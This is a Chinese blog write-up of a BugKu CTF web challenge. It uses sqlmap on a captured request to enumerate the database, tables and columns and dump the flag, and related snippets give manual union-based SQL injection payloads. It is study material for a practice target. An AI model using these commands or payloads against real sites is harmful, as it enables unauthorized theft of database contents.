BugKu之成绩单

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量1.4k 收藏 3
点赞数 1
分类专栏: BugKu 文章标签: WriteUp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tle_Camouflage/article/details/81978305
版权

成绩单(Web)

  • 输入1并进行抓包。
    这里写图片描述

  • 然后按右键,点击copy to file保存文件,这里我保存到了C盘 333.txt。
    这里写图片描述

  • 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db
    -r –> 加载一个文件
    -p –>指定参数
    –current-db –>获取当前数据库名称(current前有两个-)
    这里写图片描述

  • 可以看到它的数据库为 ‘skctf_flag’,接着就是爆表
    sqlmap.py -r “C:\333.txt” -p id -D skctf_flag - -tables
    -D –>指定数据库名称
    –tables –>列出数据库中的表(tables前有两个-)
    这里写图片描述

  • 可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了
    sqlmap.py -r “C:\333.txt” -p id -D skctf_flag -T fl4g –columns
    -T –>指定表名称
    –columns –>列出表中的字段
    这里写图片描述

  • fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。
    sqlmap.py -r “c:\333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag –dump
    –dump –>列出字段数据(dump前有两个-)
    这里写图片描述

  • PS:第一次写博客,这道题一开始没有做出来,也是看了一些大佬的博客才想到的。顺便为sqlmap的基本使用做一个小笔记。

Tle_Camouflage
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku成绩单
Seaern的博客
07-25 160
题目链接 打开链接发现是一个表单 分别输入1,2,3有数据传回 那就应该是 sql注入呀~ 1.首先爆字段 在输入框提交 id=1' order by 4# 正常返回数据 id=1' order by 5# 返回空 即可确定字段数为4 2.爆数据库名 0' union select 1,database(),user(),version()# 3.根据数据库名查询表名 id=0' ...
Bugku---web---成绩查询
weixin_47450099的博客
06-03 547
sql注入相关知识,内有各种爆破语句
bugkuctf 成绩单
舞动的獾
06-20 681
bugkuctf成绩单 用hackbar插件的post对它进行测试,之前测试了出现人的成绩单,所以测试4,或者更高. id=1' order by 5# 没有回显,所以试试4 id=1' order by 4# 所以可以知道有四列 尝试联合查询 记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据 id=0' union select 1,2,3,4 # ...
bugku-成绩单
weixin_42430107的博客
07-16 144
转载:https://www.cnblogs.com/0yst3r-2046/p/10756453.html mysql注释符有三种: 1、#... 2、"-- ",注意--后面有一个空格 3、/*...*/ 本题过滤了“-- ”可以采用#号 本道题倒在了“加上单引号’则数据为空,但是再加上注释符#就又正常了 ” 不知道为啥会加上单引号为空加上注释符后正常。 mysql函数: current_user() , user(), system_user() : 返回当前用户 databas.
bugku成绩单
qq_51283187的博客
08-13 173
bugku成绩单 今天重温经典做了一遍这个题 哎,SQL注入好多细节都忘了该补补课了。 1 sql注入的时候order by 一定要看好10000000是不是也可以 刚刚做题的时候1" order by 10000000000# 这样都行,就很离谱,起不到想知道有多少列的效果了 2 这个时候我们再换用 1’ order by 4 # ok 1’ order by 5 # error 这样就知道只有’在这里才生效 3 对了还要注意前一个为-1,留出位置。好久不复习了,都要忘了 4 并且还要注意噢, -1 un
Bugku成绩单
Newbiek的博客
04-02 901
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
bugku 成绩单
weixin_46578840的博客
07-24 78
打开网站抓包,直接开整 -1’ union select 1,2,3,4 – //四列 -1’ union select 1,2,3,database() – //得出数据库 -1’ union select 1,2,3,(select group_concat(table_name) from information_schema.tables wheretable_schema=‘skctf’) – //得出表 id=-94’ union select 1,2,3,(select group_conca
CTF之Bugku 成绩单
weixin_41607190的博客
11-04 209
这道题很久之前就看到过了,现在才弄明白。。。 这么输入有回显 这么输入就没有了,为什么呢 当我们用查询语句 select * from emp order by x 假如emp这个表的字段有10个,那么x的值就只能是1-10 如果超过10,就不回显 所以说明显示只有4列,并没有隐藏什么 接下来就是爆库、爆表、包字段了 数据库叫skctf_flag,database()函数可以返回当前的数据...
Bugku web 成绩单
S123KO的博客
08-24 292
本题直接在页面中的查询栏输入: 1' order by 4# (求出列数4列) 1' and 1=2 union select 1,2,3,4# (求显示位) 1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag) 1'and 1=2 union select 1,2,3,group_concat(table_name)from...
BugKu——成绩单
D-R0s1的博客
10-08 875
  sql注入在CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
[毕设]Delphi题库管理与试卷自动生成系统.zip
最新发布
07-27
[毕设]Delphi题库管理与试卷自动生成系统
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值